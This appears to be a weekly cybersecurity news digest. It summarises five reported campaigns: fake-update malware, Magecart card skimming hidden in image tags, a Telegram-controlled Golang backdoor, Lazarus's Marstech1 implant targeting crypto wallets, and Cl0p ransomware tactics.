Weekly Summary Cyberattacks Feb 13-19

Cybersecurity researchers warn of new cyber-attack campaigns using fake software updates   

Cybersecurity researchers have identified two new threat groups, TA2726 and TA2727, that distribute malware via compromised websites. These attackers use fake software update advertisements to trick users into downloading malware onto their devices. One of the most worrying threats is FrigidStealer, a malware targeting MacOS, which steals personal information such as passwords and banking details. Depending on the user's operating system, attacks can install other types of malware, such as Lumma Stealer on Windows or Marcher on Android. Experts warn that these campaigns are difficult to detect, as the attackers use legitimate sites to spread the malware. They recommend that users avoid downloading updates from unofficial sources and that companies strengthen their security systems to prevent these threats.  

Hackers use image tags to steal credit card data in Magento   

A new malware campaign has been detected targeting online stores using Magento, hiding malicious code within image tags in the HTML to evade detection. This technique, linked to the MageCart group, allows the theft of payment information entered into checkout forms. The attack uses the “onerror” function in <img> tags to trigger JavaScript when an image fails to load, which browsers consider legitimate. This enables cybercriminals to insert fake forms on payment pages, capturing details such as card number, expiration date, and CVV, and sending them to external servers without the user noticing. Additionally, a similar method has been discovered in WordPress, where attackers use the "must-use plugins" folder to insert backdoors that execute automatically on every page load, without appearing in the conventional plugins list. These findings highlight the evolving threats to e-commerce platforms.  

New backdoor written in Golang uncovered using Telegram to evade detection   

Cybersecurity researchers have identified a new Golang-based malware that uses Telegram's bot API as a communication channel for command and control (C2). The backdoor, which could be of Russian origin, is in development but is already fully functional. The malware initially executes by checking if it is operating on the path “C:Windows Tempvchost.exe”. If not, it copies itself to that location and restarts automatically. Its peculiarity lies in the use of an open-source library that allows it to interact with Telegram to receive commands from a chat controlled by the attackers. Among the commands implemented are “/cmd” to execute commands in PowerShell, “/persist” to ensure its permanence in the system, and “/selfdestruct” to delete itself. Although the “/screenshot” command is not yet operational, it sends a message falsely indicating that the capture was performed. The Russian origin is suggested because the “/cmd” command requests instructions in Russian within the chat. Experts warn that the use of cloud applications, such as Telegram, makes it difficult to detect threats and facilitates their deployment in attacks.  

Operation Marstech Mayhem: Lazarus targets cryptocurrency developers and wallets   

A recent report has revealed that the North Korean hacking group Lazarus has launched “Operation Marstech Mayhem”, deploying a new malware called Marstech1. This advanced implant has been used since late 2024 in attacks targeting cryptocurrency developers and platforms. The malware operates through command-and-control servers with novel configurations, employing advanced obfuscation techniques such as XOR encryption and Base85 encryption to evade detection. In addition, Lazarus has been publishing code to GitHub repositories, hiding the malware within seemingly legitimate projects. One of Marstech1's main targets is the manipulation of browser extensions, especially cryptocurrency wallets such as MetaMask, in addition to data mining of wallets such as Exodus and Atomic. The malware collects system information and exfiltrates sensitive data to servers controlled by the attackers. This operation marks an evolution in Lazarus' tactics, differentiating it from previous campaigns such as Operation 99 and Phantom Circuit. The increasing sophistication of their techniques reinforces the need for tighter security measures in the supply chain and software development. 

Cl0p ransomware hides in compromised networks after exfiltrating its victims' data   

The Cl0p ransomware group has perfected its tactics to remain hidden in compromised networks after exfiltrating sensitive data. Known for its dual extortion strategy, this cybercriminal group not only encrypts files, but also threatens to leak stolen information to pressure its victims. Recent attacks have revealed that, after extracting critical data, Cl0p operators remove traces of their activity and maintain their presence on the attacked systems, thereby enabling new offensives. Their campaigns have exploited vulnerabilities in platforms such as Cleo Harmony and MOVEit Transfer, affecting millions of assets globally. In order to infiltrate, Cl0p uses phishing emails and exploits security flaws. Once inside, it employs tools such as Cobalt Strike for information theft and advanced evasion techniques, including log deletion and manipulation of legitimate processes. In addition, in some cases, the group has chosen to extract data without encrypting it, demonstrating its ability to adapt. Sectors such as manufacturing, retail and transportation have been the most affected, with the U.S. accounting for 72% of recent victims.